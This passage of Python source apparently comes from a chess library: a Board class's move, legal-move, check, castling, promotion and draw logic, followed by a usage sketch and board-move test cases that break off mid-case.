promotion_target: Optional[str] = None) -> dict:
"""Move the a current player's piece.
Move the a current player's piece that is specified via a coordinate on
the board (`source_coord`) to a target coordinate (`target_coord`).
If the move from source to target is legal, it will be executed.
If a pawn shall be promoted the `promotion_target` parameter must be specified.
This parameter identifies the type of piece that shall be spawned at the
`target_coord` coordinate on the chessboard. The pawn at the `source_coord`
coordinate will be substituted with an entity of type `Empty`.
Args:
source_coord (str or `list` of `int`): Initial coordinate of entity on board.
target_coord (str or `list` of `int`): Target coordinate of entity on board.
promotion_target (str, optional): String that identifies piece to promote pawn into.
Returns:
dict: The boards state.
The output is shaped like:
{
"state": state, # The boards state.
"source_coord": source_coord, # The source coordinate.
"target_coord": target_coord, # The target coordinate.
"event": { # Object with details about an event.
"type": message, # Type of an event.
"extra": extra # Extra data about the event.
}
}
Raises:
ValueError: If the source and target coordinate are equal or out of bounds.
NotInPlayersPossesionException: The source coordinate isn't under the current player's possession.
MoveNotLegalException: The move from source to target is not legal.
NoPieceAtSpecifiedCoordinateException: There is no piece at the coordinate.
Example:
>>> board = Board()
>>> board.move([0, 6], [0, 5])
{
"state": "ongoing",
"source_coord": {
"x": 0,
"y": 6,
}
"target_coord": {
"x": 0,
"y": 5,
}
"event": {
"type": None,
"extra": None
}
}
Todo:
# TODO: Implement draw by default.
# TODO: Test behavior.
"""
if target_coord == source_coord:
raise ValueError(
"The target coordinate can't be equal to the source coordinate!")
sx, sy = source_coord
tx, ty = target_coord
boundary = Boundary(0, 8)
if not (boundary.accepts((sx, sy))):
raise ValueError(
"The source coordinate is out of bounds: {}".format(source_coord))
if not (boundary.accepts((tx, ty))):
raise ValueError(
"The target coordinate is out of bounds: {}".format(target_coord))
# Construct JSON for the function output.
event = {"type": None, "extra": None}
source_entity = self.board[sy][sx]
target_entity = self.board[ty][tx]
if not isinstance(source_entity, Piece):
raise NoPieceAtSpecifiedCoordinateException(
"There is no piece at the specified coordinate. {}".format(source_coord))
else:
if source_entity.get_player() != self.player:
raise NotInPlayersPossesionException(
"The piece at source coordinate is not in the current player's possesion!")
source_moves, others = self.get_piece_options(source_entity)
if target_coord not in source_moves:
raise MoveNotLegalException(
"The move from the source coordinate to the target coordinate is not legal!")
else:
if others:
for element in others:
cx, cy = element["companion"]
companion = self.board[cy][cx]
x, y = element["cmove"]
pmove = element["pmove"]
if target_coord == pmove:
# Place ``Empty`` at the companions former coordinate.
self.board[cy][cx] = Empty([cx, cy])
# Place the `companion` at the new coordinate.
companion.set_coord([x, y])
self.board[y][x] = companion
# Place the `source_entity` at the new coordinate.
source_entity.set_coord([tx, ty])
self.board[ty][tx] = source_entity
# Place ``Empty`` at the king former coordinate.
self.board[sy][sx] = Empty([sx, sy])
side = "queenside" if tx < 4 else "kingside"
event = {"type": "castle", "extra": side}
break
else:
if isinstance(source_entity, Pawn) and (ty == 0 or ty == 7) and isinstance(target_entity, Empty):
# If the promotion target is missing, report it without touching the board.
if promotion_target is None:
    return {
        "state": self.state,
        "source_coord": coord_to_dict(source_coord),
        "target_coord": coord_to_dict(target_coord),
        "event": {"type": "missing_promotion_target", "extra": None}
    }
self.board[ty][tx] = str_to_piece(
    promotion_target, target_coord, self.player, whitelist={"Queen", "Rook", "Bishop", "Knight"})
event = {"type": "promotion", "extra": promotion_target}
else:
if isinstance(self.board[ty][tx], Piece):
event["type"] = "captures"
else:
event["type"] = "move"
is_unique, overlapp = self.is_unique_move(target_coord, source_entity)
if is_unique:
event["extra"] = "unique"
else:
event["extra"] = "".join(filter(None, ["multiple", overlapp]))
source_entity.set_coord(target_coord)
self.board[ty][tx] = source_entity
if (isinstance(source_entity, (Rook, King))):
# TODO: Check if works!
source_entity.did_move()
self.board[sy][sx] = Empty([sx, sy])
# Set up for next turn.
self.last = coord_to_dict(target_coord)
self.next_turn()
return {
"state": self.state,
"source_coord": coord_to_dict(source_coord),
"target_coord": coord_to_dict(target_coord),
"event": event
}
def inspect(self, coord: list[int, int]) -> dict:
"""Inspect a piece's moves.
Get the moves of a current player's piece
that is identified via its coordinate on the board.
Args:
coord (`list` of `int`): Coordinate on the chess board.
Returns:
`dict`: Dictionary that represents data about a pieces moves.
Raises:
ValueError: If the source and target coordinate are equal or out of bounds.
NotInPlayersPossesionException: The source coordinate isn't under the current player's possession.
NoPieceAtSpecifiedCoordinateException: There is no piece at the coordinate.
Example:
>>> board = Board()
>>> board.inspect([0, 6])
{
"coord": {
"x": 0,
"y": 6
},
"piece": {
"type": "Pawn",
"player": "white",
"coord": {
"x": 0,
"y": 6
},
"pinned": False,
"attacker": None
},
"moves": [
{
"x": 0,
"y": 5
},
{
"x": 0,
"y": 4
},
]
}
"""
x, y = coord
# Check if the coordinate is on the chess board.
boundary = Boundary(0, 8)
if not (boundary.accepts((x, y))):
raise ValueError(f"The piece coordinate is out of bounds: {coord}")
entity = self.board[y][x]
if isinstance(entity, Piece):
if entity.get_player() != self.player:
raise NotInPlayersPossesionException(
"The piece at source coordinate is not in the current player's possesion!")
piece_moves, _ = self.get_piece_options(entity, find_others=False)
return {
"coord": coord_to_dict(coord),
"piece": entity.to_dict(entity),
"moves": coord_to_dict(piece_moves, as_list=True)
}
raise NoPieceAtSpecifiedCoordinateException(
"There is no piece at the specified coordinate. {}".format(coord))
def get_piece_options(self, piece: Piece, board: list[list[Entity]] = None,
find_others: bool = True, attacking: bool = False) -> list[list[int, int]]:
"""Find a pieces legal moves.
Args:
piece (`Piece`): A piece of the current player.
find_others (`bool`, optional): States if information about companion moves shall be returned.
attacking (`bool`, optional): States if only moves that attack enemy pieces shall be returned.
board (`list` of `list` of `Entity`, optional): list representing a board.
Returns:
`list`: piece_moves and companion moves
* piece_moves (`list` of `list` of int):
list of coordinates that can be legally accessed by the piece.
* others (`list` of `dict`):
list of dicts of data associated with other legal moves (e.g. for castling).
The dicts inside the list are of the shape:
{
"companion": `Piece`,
"others": `list` of `list` of `int`
"piece_moves": `list` of `list` of `int`
}
Example:
>>> board = Board() # Initialize a new board.
>>> piece = board.get()[6][0] # Moves of white pawn on a2.
>>> board.get_piece_options(piece) # Get the piece's options.
([[0, 5], [0, 4]], [])
"""
moves = []
others = []
px, py = piece.get_coord()
# If no `board` is specified select the position (`self.board`).
if board is None:
board = self.board
# Return the piece's options if they are already known.
if piece.get_options():
options = piece.get_options()
return options["moves"], options["others"]
boundary = Boundary(0, 8)
for dx, dy in piece.get_moves():
# Invert the movement for white `pieces`,
# because of the way the board has been initialized.
if piece.get_player() == "white":
dy *= -1
x, y = px, py
loop = True
# Traverse the path given by the movement of the `piece` types
# from the `piece` coordinate and record the coordinates
# until another `piece` is found or the coordinate is out of bounds.
# These recorded coordinates are regarded as the legal moves.
while loop and boundary.accepts((x + dx, y + dy)):
x += dx
y += dy
entity = board[y][x]
if isinstance(entity, Piece):
if attacking:
loop = False
else:
if self.is_other_player_piece(entity, piece):
loop = False
else:
break
# Check if the `piece` could check the enemy king
# if a enemy `piece` would move. Set this `piece` to `pinned`.
if not self.is_check() and isinstance(piece, (Bishop, Rook, Queen)):
tmp_x, tmp_y = x, y
while boundary.accepts((tmp_x + dx, tmp_y + dy)):
tmp_x += dx
tmp_y += dy
tmp_entity = board[tmp_y][tmp_x]
if isinstance(tmp_entity, Piece):
if self.is_other_player_king(tmp_entity, piece):
sx, sy = entity.get_coord()
self.board[sy][sx].set_pinned(True)
self.board[sy][sx].set_pinner(piece.get_coord())
break
moves.append([x, y])
# End the loop for `pieces` of type ``Pawn``, ``Knight`` or ``King``.
if isinstance(piece, (Pawn, Knight, King)):
break
if isinstance(piece, King) and not attacking:
def not_attacked(move):
    x, y = move
    return not board[y][x].is_attacked()
moves = list(filter(not_attacked, moves))
# Check if the `piece` is of type ``Pawn``
# and can execute it's unique movement.
if isinstance(piece, Pawn):
amoves = []
for move in piece.get_attack_moves():
dx, dy = move
# Invert the movement for white `pieces`,
# because of the way the board has been initialized.
if piece.get_player() == "white":
dy *= -1
x, y = px + dx, py + dy
if boundary.accepts((x, y)):
# Check if a `piece` is at the current coordinate.
entity = board[y][x]
# Add the coordinate to `attacking_moves` if
# a ``Piece`` of the enemy is at the coordinate.
if not attacking and isinstance(entity, Piece):
if self.is_other_player_piece(entity, piece):
amoves.append([x, y])
# Add the coordinate to `attacking_moves` regardless
# of the fact that a ``Piece`` is at the coordinate.
# Because all attacking moves are recorded.
# Check only if a chess piece is in the opponent's possession.
elif attacking:
amoves.append([x, y])
# If only attacking moves shall be recorded,
# `piece_moves` equal `attacking_moves`.
if attacking:
moves = amoves
# Else append the `attacking_moves` to `piece_moves`
# and check if the ``Pawn`` can execute it's special move.
else:
moves += amoves
if piece.can_special():
dx, dy = piece.get_special_move()
if piece.get_player() == "white":
dy *= -1
x, y = px + dx, py + dy
# Check if all coord in the path to [x, y] are empty.
coords = [[x, y - int(dy/2)], [x, y]]
if all(isinstance(board[j][i], Empty) for i, j in coords):
moves.append([x, y])
# Check if `piece` is `pinned`. If the `piece` is `pinned`
# it can only move in the `attackers` direction.
# To compute the legal moves keep the coordinates
# in the `attackers` `line_of_attack`
# (the attackers moves towards the king).
if piece.is_pinned():
ax, ay = piece.get_pinner()
dx, dy = ax - px, ay - py
dx, dy = normalize(dx), normalize(dy)
start_x, stop_x = sorted([ax, px])
xboundary = Boundary(start_x, stop_x)
start_y, stop_y = sorted([ay, py])
yboundary = Boundary(start_y, stop_y)
x, y = px, py
tmp = []
while xboundary.accepts(x + dx) and yboundary.accepts(y + dy):
x += dx
y += dy
tmp.append([x, y])
moves = list(filter(lambda move: move in tmp, moves))
# If the current player is in check: Find all moves that resolve the check.
if self.is_check() and not attacking:
# If the `piece` is of type ``King`` then only moves
# that lead to non attacked coordinates are valid.
if isinstance(piece, King):
ax, ay = dict_to_coord(self.last)
entity = board[ay][ax]
emoves = []
boundary = Boundary(0, 8)
for dx, dy in entity.get_moves():
x, y = ax, ay
while boundary.accepts((x + dx, y + dy)):
x += dx
y += dy
entity = board[y][x]
if isinstance(entity, Empty) or entity == piece:
emoves.append([x, y])
else:
break
moves = list(filter(lambda move: move not in emoves, moves))
# Else find the king and all moves of the
# `piece` that hide the king from check.
else:
king = self.get_player_king()
# List of all moves to avoid check.
tmp = []
# Set the `state` temporary to "ongoing" to look
# into future positions without restrictions.
self.state = "ongoing"
# To block check the `piece` has to step into
# squares on the board that are being attacked by the enemy.
# Compute these and check if the king is hidden from check.
other_player_options = self.get_other_player_options(
include_piece_coord=True)
for move in moves:
if move in other_player_options:
tmp_board = copy.deepcopy(board)
tmp_piece = copy.deepcopy(piece)
x, y = move
tmp_piece.set_coord([x, y])
tmp_board[y][x] = tmp_piece
tmp_board[py][px] = Empty([px, py])
if king.get_coord() not in self.get_other_player_options(board=tmp_board, save=False):
tmp.append([x, y])
self.state = "check"
moves = tmp
# Check if the player can castle.
# To do so, first check whether the king or the involved rook
# (identified by the side the `target_coord` leads to) has already moved.
# Afterwards check if the enemy attacks squares that are needed
# for castling or if these squares are obstructed.
if self.can_player_castle(piece, find_others, attacking):
# Check if king has already moved.
if not piece.get_moved():
for step in range(-1, 2, 2):
cx = 0 if step == -1 else 7
companion = board[py][cx]
# Check if the `companion` of type `Rook` has already moved.
if (isinstance(companion, Rook) and not companion.get_moved()):
# Check for obstructed or attacked squares.
path_not_obstructed = True
start, stop = (5, 7) if step == 1 else (1, 4)
for x in range(start, stop):
entity = board[py][x]
if isinstance(entity, Piece) or entity.is_attacked():
path_not_obstructed = False
break
if path_not_obstructed:
mx, my = px + step * 2, py
moves.append([mx, my])
# TODO: Update comments that reference companion as `Piece`.
others.append({
"companion": companion.get_coord(),
"cmove": [mx - step, py],
"pmove": [mx, my],
})
return moves, others
def is_other_player_piece(self, piece: Piece, other: Optional[Piece] = None) -> bool:
"""Return if the piece is owned by the other player.
Args:
piece (`Piece`): The piece to check the player.
other (`Piece`, optional): Optional piece to reference a player.
"""
if other:
return piece.get_player() != other.get_player()
return piece.get_player() != self.player
def is_other_player_king(self, piece: Piece, other: Optional[Piece] = None) -> bool:
"""Return if the piece is a king owned by the other player.
Args:
piece (`Piece`): The piece to check the player.
other (`Piece`, optional): Optional piece to reference a player.
"""
player = other.get_player() if other else self.player
return isinstance(piece, King) and piece.get_player() != player
def is_check(self) -> bool:
"""Return if the board's state is 'check'."""
return self.state == "check"
def is_unique_move(self, coord: list[int, int], piece: Piece) -> tuple[bool, str]:
"""Return if the pieces move to coord is unique for it's type."""
px, py = piece.get_coord()
for other in self.get_player_pieces_like(piece):
if coord in other.get_options()["moves"]:
ox, oy = other.get_coord()
overlapp = ""
if px == ox:
overlapp = "row"
elif py == oy:
overlapp = "rank"
return False, overlapp
return True, ""
def get_player_pieces(self, player: str, board: list[list[Entity]] = None) -> list[Piece]:
"""Get a player's pieces.
Args:
player (str): The player whose pieces shall be returned.
board (`list` of `list` of `Entity`, optional): list representing a board.
Returns:
list: list of the specified player's pieces.
"""
pieces = []
if board is None:
board = self.board
for row in board:
for entity in row:
if isinstance(entity, Piece):
if entity.get_player() == player:
pieces.append(entity)
return pieces
def get_player_king(self, player: Optional[str] = None) -> King:
"""Get the player's king."""
if not player:
player = self.player
for piece in self.get_player_pieces(player):
if isinstance(piece, King):
return piece
def get_player_pieces_like(self, piece: Piece, player: Optional[str] = None) -> list[Piece]:
"""Get the player's piece of the same type as the provided piece."""
if not player:
player = self.player
def like(other: Piece):
return other.__class__ == piece.__class__ and other != piece
pieces = self.get_player_pieces(player)
return list(filter(like, pieces))
def get_player_options(self, player: Optional[str] = None, board: list[list[Entity]] = None,
attacking: bool = False, include_piece_coord: bool = False, save: bool = True) -> list[list[int]]:
"""Find all valid moves of a player's pieces.
Args:
player (`str`): The player whose pieces shall be returned.
board (`list` of `list` of `Entity`, optional): list representing a board.
attacking (`bool`, optional): States if only moves that attack enemy pieces shall be returned.
include_piece_coord (`bool`, optional): States if a piece's coordinate shall be added to its moves.
Returns:
options: list of all legal moves the player can make.
"""
options = []
if player is None:
player = self.player
if board is None:
board = self.board
for piece in self.get_player_pieces(player, board=board):
moves, others = self.get_piece_options(
piece, attacking=attacking, board=board)
if save:
x, y = piece.get_coord()
self.board[y][x].set_options({
"moves": moves,
"others": others
})
if include_piece_coord:
moves.append(piece.get_coord())
options += moves
return options
def get_other_player_options(self, board: list[list[Entity]] = None,
include_piece_coord: bool = False, save: bool = True) -> list[list[int]]:
"""Find all squares of the enemy attacks.
Args:
board (`list` of `list` of `Entity`, optional): list representing a board.
include_piece_coord (`bool`, optional): States if a piece's coordinate shall be added to its moves.
Returns:
list: list of coordinates the enemy attacks.
Todos:
TODO: Add valid example.
"""
if board is None:
board = self.board
return self.get_player_options(self.other_player(), board=board, attacking=True,
include_piece_coord=include_piece_coord, save=save)
def clear(self) -> None:
"""Cleares the boards entities dynamic attributes."""
for y in range(8):
for x in range(8):
entity = self.board[y][x]
entity.set_attacked(False)
if isinstance(entity, Piece):
entity.set_options({"moves": [], "others": []})
entity.set_pinned(False)
entity.set_pinner(None)
self.board[y][x] = entity
def update(self) -> None:
"""Update the board with respect to the new position."""
self.clear()
options = self.get_other_player_options()
for x, y in options:
self.board[y][x].set_attacked(True)
# Check if king is in check.
if self.get_player_king().is_attacked():
self.state = "check"
options = self.get_player_options()
# Update board state.
if self.state == "check":
if options:
self.state = "check"
else:
self.state = "checkmate"
else:
if not options:
self.state = "stalemate"
if self.draw_insufficient_material():
self.state = "draw"
def draw_insufficient_material(self) -> bool:
"""Return if neither player can win."""
return (self.player_insufficient_material("white")
and self.player_insufficient_material("black"))
def player_insufficient_material(self, player):
"""Return if the player has insufficient material to win."""
pieces = self.get_player_pieces(player)
# With a Pawn, Rook or Queen the player has sufficient material.
if any(isinstance(piece, (Pawn, Rook, Queen)) for piece in pieces):
return False
# Check if only king or only king and knight or bishop are on the board.
if len(pieces) == 1 or len(pieces) == 2:
return True
# Check if the player has any knights on the board.
if any(isinstance(piece, Knight) for piece in pieces):
return False
bishops = list(filter(lambda piece: isinstance(piece, (Bishop)), pieces))
colors = [self.get_coord_color(piece.get_coord()) for piece in bishops]
# Check if all of the bishops are of the same color.
if all(color == colors[0] for color in colors):
return True
return False
def get_coord_color(self, coord) -> str:
"""Return the color of the square on the board at coord."""
x, y = coord
if (x + y) % 2 == 0:
return "white"
return "black"
def next_turn(self) -> None:
"""Set up the next turn."""
self.player = self.other_player()
self.update()
def other_player(self) -> str:
"""Return the other player with respect to the current player."""
return "white" if self.player == "black" else "black"
def can_player_castle(self, piece: Piece,
find_others: bool, attacking: bool) -> bool:
"""Return if player can castle.
Args:
piece (`Piece`): Selected piece on the chess board.
find_others (`bool`): States if castling shall be considered.
attacking (`bool`): States if only attacking moves shall be added.
Returns:
bool: Can the player castle?
"""
return (
self.state != "check"
and isinstance(piece, King)
and find_others
and not attacking
)
def to_dict(self) -> dict:
"""Return a JSON representation of the board."""
pieces = self.get_player_pieces("white") + self.get_player_pieces("black")
pieces = [piece.to_dict() for piece in pieces]
return {
"state": self.state,
"player": self.player,
"last": self.last,
"pieces": pieces
}
def from_dict(self, json: dict) -> None:
"""Reconstruct the board from JSON."""
self.state = json["state"]
self.player = json["player"]
self.last = json["last"]
self.set(empty_board())
for i in json["pieces"]:
coord = dict_to_coord(i["coord"])
piece = str_to_piece(i["type"], coord, i["player"])
options = i["options"]
piece.set_options({
"moves": dict_to_coord(options["moves"], as_list=True),
"others": options["others"]
})
piece.set_pinned(i["pinned"])
piece.set_pinner(i["pinner"])
x, y = coord
self.board[y][x] = piece
self.update()
def view(self, squares: list[list[int]] = []) -> str:
"""View of the current board.
Args:
squares (`list` of `list` of `int`): list of squares on the chess board that shall be marked.
Returns:
str: A string representation of the chess board.
Example:
>>> board = Board()
>>> print(board.view())
♜ ♞ ♝ ♛ ♚ ♝ ♞ ♜
♟︎ ♟︎ ♟︎ ♟︎ ♟︎ ♟︎ ♟︎ ♟︎
⊡ ⊡ ⊡ ⊡ ⊡ ⊡ ⊡ ⊡
⊡ ⊡ ⊡ ⊡ ⊡ ⊡ ⊡ ⊡
⊡ ⊡ ⊡ ⊡ ⊡ ⊡ ⊡ ⊡
⊡ ⊡ ⊡ ⊡ ⊡ ⊡ ⊡ ⊡
♙ ♙ ♙ ♙ ♙ ♙ ♙ ♙
♖ ♘ ♗ ♕ ♔ ♗ ♘ ♖
"""
board = ""
for y, row in enumerate(self.board):
line = ""
for x, square in enumerate(row):
if [x, y] in squares:
line += "⛝ "
else:
line += str(square) + " "
board += line + "\n"
return board
def show(self, squares: list[list[int]] = []) -> None:
"""Show the current board.
Args:
squares (`list` of `list` of `int`): list of squares on the chess board that shall be marked.
"""
print(self.view(squares))
def initial_board() -> list[list[Entity]]:
"""Create a nested list of Entitys that represents the chess board.
Note:
The chess board is built with the position
'a8' at the coordinate (0, 0) (h1 --> (7, 7)).
Reminder: Coordinates have to be translated!
This function is called in the constructor.
Example:
>>> from pycheese.core.board import *
>>> board = Board()
>>> board.set(initial_board())
>>> print(board.show())
♜ ♞ ♝ ♛ ♚ ♝ ♞ ♜
♟︎ ♟︎ ♟︎ ♟︎ ♟︎ ♟︎ ♟︎ ♟︎
⊡ ⊡ ⊡ ⊡ ⊡ ⊡ ⊡ ⊡
⊡ ⊡ ⊡ ⊡ ⊡ ⊡ ⊡ ⊡
⊡ ⊡ ⊡ ⊡ ⊡ ⊡ ⊡ ⊡
⊡ ⊡ ⊡ ⊡ ⊡ ⊡ ⊡ ⊡
♙ ♙ ♙ ♙ ♙ ♙ ♙ ♙
♖ ♘ ♗ ♕ ♔ ♗ ♘ ♖
Returns:
list: Nested list of Entities that represents the chess board.
"""
board = []
board.append([
Rook([0, 0], "black"),
Knight([1, 0], "black"),
Bishop([2, 0], "black"),
Queen([3, 0], "black"),
King([4, 0], "black"),
Bishop([5, 0], "black"),
Knight([6, 0], "black"),
Rook([7, 0], "black"),
])
board.append([Pawn([i, 1], "black") for i in range(8)])
for i in range(4):
board.append([Empty([j, i + 2]) for j in range(8)])
board.append([Pawn([i, 6], "white") for i in range(8)])
board.append([
Rook([0, 7], "white"),
Knight([1, 7], "white"),
Bishop([2, 7], "white"),
Queen([3, 7], "white"),
King([4, 7], "white"),
Bishop([5, 7], "white"),
Knight([6, 7], "white"),
Rook([7, 7], "white"),
])
return board
def empty_board() -> list[list[Entity]]:
"""Create a nested list of Entitys that represents an empty chess board.
Note:
The chess board is built with the position
'a8' at the coordinate (0, 0) (h1 --> (7, 7)).
Reminder: Coordinates have to be translated!
Example:
>>> board = Board()
>>> board.board = empty_board()
>>> board.show()
⊡ ⊡ ⊡ ⊡ ⊡ ⊡ ⊡ ⊡
⊡ ⊡ ⊡ ⊡ ⊡ ⊡ ⊡ ⊡
⊡ ⊡ ⊡ ⊡ ⊡ ⊡ ⊡ ⊡
⊡ ⊡ ⊡ ⊡ ⊡ ⊡ ⊡ ⊡
⊡ ⊡ ⊡ ⊡ ⊡ ⊡ ⊡ ⊡
⊡ ⊡ ⊡ ⊡ ⊡ ⊡ ⊡ ⊡
⊡ ⊡ ⊡ ⊡ ⊡ ⊡ ⊡ ⊡
⊡ ⊡ ⊡ ⊡ ⊡ ⊡ ⊡ ⊡
Returns:
list: Nested list of Entities that represents an empty chess board.
"""
board = []
for i in range(8):
board.append([Empty([j, i]) for j in range(8)])
return board
def str_to_piece(type: str, coord: list[int], player: str, whitelist: Optional[set] = None) -> Piece:
"""Return a piece via it's type and other params.
Args:
type (str): Name of the class of the `Piece` object.
coord (:obj:`list` of :obj:`int`): Coordinate of the piece on board.
player (str): Name of the piece's player.
whitelist (:obj:`set` of str): Whitelist for piece types.
Returns:
piece: A default piece object of given type and coord as well as player.
Raises:
NotWhitelistedException: The given piece type is not whitelisted!
"""
if whitelist and type not in whitelist:
raise NotWhitelistedException(f"The given piece type is not whitelisted! {type} not in {whitelist}")
switch = {"Pawn": Pawn, "Knight": Knight, "Bishop": Bishop,
"Rook": Rook, "Queen": Queen, "King": King}
return switch[type](coord, player)
```
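A minimal round-trip sketch for the `to_dict`/`from_dict` pair above, assuming the `pycheese` package is importable as in the docstring examples:
```python
# Serialize a fresh board and rebuild the same position from the dict.
from pycheese.core.board import Board

board = Board()
snapshot = board.to_dict()    # JSON-serializable dict: state, player, last move, pieces

restored = Board()
restored.from_dict(snapshot)  # rebuilds each piece via str_to_piece/dict_to_coord
restored.show()               # prints the reconstructed position
```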
#### File: test/cases/cases_board_move.py
```python
def case_napoleon_attack() -> list:
    """Test case for the board's `move` function.
    To test the function the following chess game will be played:
1. e4 e5 2. Qf3 Nc6 3. Bc4 d6 4. Qxf7#
"""
return [
{
"source_coord": [4, 6],
"target_coord": [4, 4],
"promotion_target": None,
"output": {
'state': 'ongoing',
'source_coord': {'x': 4, 'y': 6},
'target_coord': {'x': 4, 'y': 4},
'event': {'extra': 'unique', 'type': 'move'}
}
},
{
"source_coord": [4, 1],
"target_coord": [4, 3],
"promotion_target": None,
"output": {
'state': 'ongoing',
'source_coord': {'x': 4, 'y': 1},
'target_coord': {'x': 4, 'y': 3},
'event': {'extra': 'unique', 'type': 'move'}
}
},
{
"source_coord": [3, 7],
"target_coord": [5, 5],
"promotion_target": None,
"output": {
'state': 'ongoing',
'source_coord': {'x': 3, 'y': 7},
'target_coord': {'x': 5, 'y': 5},
'event': {'extra': 'unique', 'type': 'move'}
}
},
{
"source_coord": [1, 0],
"target_coord": [2, 2],
"promotion_target": None,
"output": {
'state': 'ongoing',
'source_coord': {'x': 1, 'y': 0},
'target_coord': {'x': 2, 'y': 2},
'event': {'extra': 'unique', 'type': 'move'}
}
},
{
"source_coord": [5, 7],
"target_coord": [2, 4],
"promotion_target": None,
"output": {
'state': 'ongoing',
'source_coord': {'x': 5, 'y': 7},
'target_coord': {'x': 2, 'y': 4},
'event': {'extra': 'unique', 'type': 'move'}
}
},
{
"source_coord": [3, 1],
"target_coord": [3, 2],
"promotion_target": None,
"output": {
'state': 'ongoing',
'source_coord': {'x': 3, 'y': 1},
'target_coord': {'x': 3, 'y': 2},
'event': {'extra': 'unique', 'type': 'move'}
}
},
{
"source_coord": [5, 5],
"target_coord": [5, 1],
"promotion_target": None,
"output": {
'state': 'checkmate',
'source_coord': {'x': 5, 'y': 5},
'target_coord': {'x': 5, 'y': 1},
'event': {'type': 'captures', 'extra': "unique"}
}
},
]
def case_queen_check_empty() -> list:
    """Test case for the board's `move` function."""
return [
{
"source_coord": [3, 6],
"target_coord": [4, 6],
"promotion_target": None,
"output": {
'state': 'check',
'source_coord': {'x': 3, 'y': 6},
'target_coord': {'x': 4, 'y': 6},
'event': {'extra': 'unique', 'type': 'move'}
}
},
]
def case_rook_checkmate() -> list:
    """Test case for the board's `move` function."""
return [
{
"source_coord": [7, 0],
"target_coord": [6, 0],
"promotion_target": None,
"output": {
'state': 'ongoing',
'source_coord': {'x': 7, 'y': 0},
'target_coord': {'x': 6, 'y': 0},
'event': {'extra': 'unique', 'type': 'move'}
}
},
{
"source_coord": [0, 1],
"target_coord": [0, 0],
"promotion_target": None,
"output": {
'state': 'checkmate',
'source_coord': {'x': 0, 'y': 1},
'target_coord': {'x': 0, 'y': 0},
'event': {'extra': 'unique', 'type': 'move'}
}
}
]
def case_castle_kingside() -> list:
    """Test case for the board's `move` function.
    To test the function the following chess game will be played:
1. Nf3 Nf6 2. e3 e6 3. Be2 Be7 4. O-O O-O
"""
return [
{
"source_coord": [6, 7],
"target_coord": [5, 5],
"promotion_target": None,
"output": {
'state': 'ongoing',
'source_coord': {'x': 6, 'y': 7},
'target_coord': {'x': 5, 'y': 5},
'event': {'extra': 'unique', 'type': 'move'}
}
},
{
"source_coord": [6, 0],
"target_coord": [5, 2],
"promotion_target": None,
"output": {
'state': 'ongoing',
'source_coord': {'x': 6, 'y': 0},
'target_coord': {'x': 5, 'y': 2},
'event': {'extra': 'unique', 'type': 'move'}
}
},
{
"source_coord": [4, 6],
"target_coord": [4, 5],
"promotion_target": None,
"output": {
'state': 'ongoing',
'source_coord': {'x': 4, 'y': 6},
'target_coord': {'x': 4, 'y': 5},
'event': {'extra': 'unique', 'type': 'move'}
}
},
{
"source_coord": [4, 1],
"target_coord": [4, 2],
"promotion_target": None,
"output": {
'state': 'ongoing',
'source_coord': {'x': 4, 'y': 1},
'target_coord': {'x': 4, 'y': 2},
'event': {'extra': 'unique', 'type': 'move'}
}
},
{
"source_coord": [5, 7],
"target_coord": [4, 6],
"promotion_target": None,
"output": {
'state': 'ongoing',
'source_coord': {'x': 5, 'y': 7},
'target_coord': {'x': 4, 'y': 6},
'event': {'extra': 'unique', 'type': 'move'}
}
},
{
"source_coord": [5, 0],
"target_coord": [4, 1],
"promotion_target": None,
"output": {
'state': 'ongoing',
'source_coord': {'x': 5, 'y': 0},
'target_coord': {'x': 4, 'y': 1},
'event': {'extra': 'unique', 'type': 'move'}
}
},
{
"source_coord": [4, 7],
"target_coord": [6, 7],
"promotion_target": None,
"output": {
'state': 'ongoing',
'source_coord': {'x': 4, 'y': 7},
'target_coord': {'x': 6, 'y': 7},
'event': {'type': 'castle', 'extra': 'kingside'}
}
},
{
"source_coord": [4, 0],
"target_coord": [6, 0],
"promotion_target": None,
"output": {
'state': 'ongoing',
'source_coord': {'x': 4, 'y': 0},
'target_coord': {'x': 6, 'y': 0},
'event': {'type': 'castle', 'extra': 'kingside'}
}
},
]
def case_castle_queenside() -> list:
    """Test case for the board's `move` function.
    To test the function the following chess game will be played:
1. Nc3 Nc6 2. d3 d6 3. Be3 Be6 4. Qd2 Qd7 5. O-O-O O-O-O
"""
return [
{
"source_coord": [1, 7],
"target_coord": [2, 5],
"promotion_target": None,
"output": {
'state': 'ongoing',
'source_coord': {'x': 1, 'y': 7},
'target_coord': {'x': 2, 'y': 5},
'event': {'extra': 'unique', 'type': 'move'}
}
},
{
"source_coord": [1, 0],
"target_coord": [2, 2],
"promotion_target": None,
"output": {
'state': 'ongoing',
'source_coord': {'x': 1, 'y': 0},
'target_coord': {'x': 2, 'y': 2},
'event': {'extra': 'unique', 'type': 'move'}
}
},
{
"source_coord": [3, 6],
"target_coord": [3, 5],
"promotion_target": None,
"output": {
'state': 'ongoing',
'source_coord': {'x': 3, 'y': 6},
'target_coord': {'x': 3, 'y': 5},
'event': {'extra': 'unique', 'type': 'move'}
}
},
{
"source_coord": [3, 1],
"target_coord": [3, 2],
"promotion_target": None,
"output": {
'state': 'ongoing',
'source_coord': {'x': 3, 'y': 1},
'target_coord': {'x': 3, 'y': 2},
'event': {'extra': 'unique', 'type': 'move'}
}
},
{
"source_coord": [2, 7],
"target_coord": [4, 5],
"promotion_target": None,
"output": {
'state': 'ongoing',
'source_coord': {'x': 2, 'y': 7},
'target_coord': {'x': 4, 'y': 5},
'event': {'extra': 'unique', 'type': 'move'}
}
},
{
"source_coord": [2, 0],
"target_coord": [4, 2],
"promotion_target": None,
"output": {
'state': 'ongoing',
'source_coord': {'x': 2, 'y': 0},
'target_coord': {'x': 4, 'y': 2},
'event': {'extra': 'unique', 'type': 'move'}
}
},
{
"source_coord": [3, 7],
"target_coord": [3, 6],
"promotion_target": None,
"output": {
'state': 'ongoing',
'source_coord': {'x': 3, 'y': 7},
'target_coord': {'x': 3, 'y': 6},
'event': {'extra': 'unique', 'type': 'move'}
}
},
{
"source_coord": [3, 0],
"target_coord": [3, 1],
"promotion_target": None,
"output": {
'state': 'ongoing',
'source_coord': {'x': 3, 'y': 0},
'target_coord': {'x': 3, 'y': 1},
'event': {'extra': 'unique', 'type': 'move'}
}
},
{
"source_coord": [4, 7],
"target_coord": [2, 7],
"promotion_target": None,
"output": {
'state': 'ongoing',
'source_coord': {'x': 4, 'y': 7},
'target_coord': {'x': 2, 'y': 7},
'event': {'type': 'castle', 'extra': 'queenside'}
}
},
{
"source_coord": [4, 0],
